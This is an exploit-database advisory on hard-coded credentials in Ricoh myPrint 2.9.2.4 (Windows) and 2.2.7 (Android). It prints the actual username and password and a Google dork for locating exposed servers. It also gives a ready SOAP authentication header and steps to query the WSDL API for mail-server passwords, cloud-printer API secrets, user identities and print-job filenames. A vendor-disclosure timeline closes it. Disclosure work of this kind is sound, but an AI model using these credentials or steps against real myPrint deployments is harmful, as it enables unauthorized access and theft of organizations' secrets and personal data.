Exploits / Vulnerability Discovered : 2018-11-26 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Ricoh myprint 2.9.2.4 hardcoded credentials is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials
# Google Dork: intitle:"ricoh myprint" "Copyright Ricoh. All Rights Reserved"
# Date: 2018-11-19
# Exploit Author: Hodorsec
# Vendor Homepage: https://www.ricoh.com
# Software Link: https://www.ricoh-europe.com/support/product-support/software-support-detail.html?prodId=100-13203
# Versions:
# myPrint - Windows client version 2.9.2.4
# myPrint - Android client version 2.2.7
# Tested on: Ricoh myPrint clients and WSDL webservice
# WSDL URL format: https://{HOST}/RicohmyPrint/MyPrintWebService.asmx?wsdl
# CVE: N/A
# Description:
# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for Android
# give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering
# API secrets of related Google cloud printers, encrypted passwords of mail servers and
# names of printed files.
# Additional Information:
# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for
# Android (reverse-engineered, identical credentials), gives access
# to any externally disclosed Ricoh myPrint WSDL API. Using the found credentials, several info can be obtained, such as:
# * Show settings such as local paths, used mailserver, mailaddresses for POP/IMAP and encrypted passwords (appears to be stream-based
# encrypted, seeing different lengths of base64 hashes passwords (Algorithm yet unknown)). --> ReadMobileSettings
# * Checks if a password is valid for ANY known user; returns "true" if password is valid for a known user --> IsPasswordValid
# * Shows all user info such as ID, name by looking up email alias --> IdentifierByEmailAlias
# * Show used internal IP addresses and TCP ports of related printers/server for Ricoh myPrint
# * Show related Google cloud printers with API secrets --> ReadGoogleCloudPrinters
# * Show all printjob-statuses with filenames --> GetJobList
# * Show related organizations --> ReadOrganizations
# Affected Components:
# * Tested Ricoh myPrint clients with indicated versions and probably any remotely accessible myPrint webserver with an accessible WSDL API.
# Affected Code:
# * Android client "WebService.java"
...<SNIP>...
public static final class
{
public static final String AUTH_PASS = "Kyg63WfC";
public static final String AUTH_USER = "ricohmyprint";
public static final String NS_RICOH = "http://RicohmyPrint.com/";
public static final String NS_SOAP12 = "http://www.w3.org/2003/05/soap-envelope";
public static final String PRE_RICOH = "ric";
public static final String PRE_SOAP12 = "soap";
public static final String SERVICE = "/RicohmyPrint/myprintwebservice.asmx";
public static final String SUPPORTED_LANGS[] = {
"en", "ca", "de", "es", "fr", "it", "nl", "no", "pl", "pt",
"sv"
};
...<SNIP>...
Attack Type:
* Remote
Attack Vectors:
Steps:
* Download the Android APK or Windows executable installer
* Reverse engineer the APK or DLL's from the Windows installer
* Look for the string "PASS" with a regex tool, which should pop up a hit
* Access the WSDL on a reachable Ricoh myPrint environment and enumerate operations with a SOAP tool (e.g. "ReadMobileSettings")
* Use any operation, substitute the "AuthSoapHd" values for UserName and Password with the found credentials
* Perform the request and check results
Header requirement:
Required for using in an SOAP WSDL POST message as a header with values:
<soapenv:Header>
<ric:AuthSoapHd>
<ric:UserName><![CDATA[ricohmyprint]]></ric:UserName>
<ric:Password><![CDATA[Kyg63WfC]]></ric:Password>
<ric:Version><![CDATA[0.1]]></ric:Version>
<ric:Application><![CDATA[Desktop]]></ric:Application>
<ric:DeviceId><![CDATA[1]]></ric:DeviceId>
</ric:AuthSoapHd>
</soapenv:Header>
Disclosure Timeline using CERT/CC disclosure policy:
- 04-10-18: Requested CVE
- 05-10-18: Contacted vendor for initial contact, used several publicly known mailaddresses
- 10-10-18: Contacted CERT for Vulnerability Disclosure coordination due to no response from vendor
- 22-10-18: CERT responded it received no response on their behalf from vendor
- 22-10-18: Sent reminder to vendor
- 19-11-18: Public Disclosure